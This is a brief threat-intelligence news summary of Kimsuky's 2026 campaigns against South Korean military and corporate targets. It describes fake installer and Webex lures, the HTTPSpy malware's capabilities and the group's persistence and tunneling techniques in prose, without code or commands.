North Korean group Kimsuky targeted South Korean military and corporate entities in March and April 2026, using fake security software pages, counterfeit Webex lures and a renewed HTTPSpy malware variant to deliver intrusion chains that included downloader scripts, persistence and remote access.
KEY FACTS
- Targets South Korean military and corporate organizations, with some activity aimed at messaging administrators.
- Lures Fake installer pages and a counterfeit Webex meeting page tied to a real schedule.
- Payloads A new HTTPSpy variant, plus downloader chains that led to other malware.
- Techniques JSONPing checks, scheduled tasks, PowerShell downloaders and VS Code tunneling.
A technical analysis by ENKI said the March campaign used a bogus page impersonating a South Korean B2B messaging service to offer security tools. The download led to executables that disguised themselves as nProtect Online Security and AhnLab Safe Transaction, but both launched the same malicious behavior.
The binaries ran a second-stage DLL through regsvr32.exe, deleted themselves, then set persistence with a scheduled task and contacted a command and control server. ENKI said the attacker likely watched repeated GET requests and selectively sent additional payloads to chosen victims.
In an April campaign, a fake Webex page told victims to run a script to fix camera access. That path led to a ZIP archive with an encrypted JSE file, then to a downloader that fetched more malware before the final DLL deployed HTTPSpy on the compromised system.
HTTPSpy can run shell commands, upload and download files, capture screenshots, inject DLL paths into processes and erase itself from the endpoint. The disclosure also said Kimsuky used JSONPing to check whether malware was running and to show an installation prompt if it was not.
Separately, Kaspersky said the group has also used VS Code tunneling, Cloudflare Quick Tunnels, DWAgent and Rust-based malware in recent campaigns, with activity spanning defense, military, government, medical, machinery and energy sectors. The report said the actor still appears to have access to original source code and can modify it.
WHY IT MATTERS
The campaigns show a mix of social engineering and living-off-the-land techniques that can make detection harder and allow tailored delivery of malware. They also point to continued evolution in a long-running North Korean intrusion set focused on South Korea and other sectors.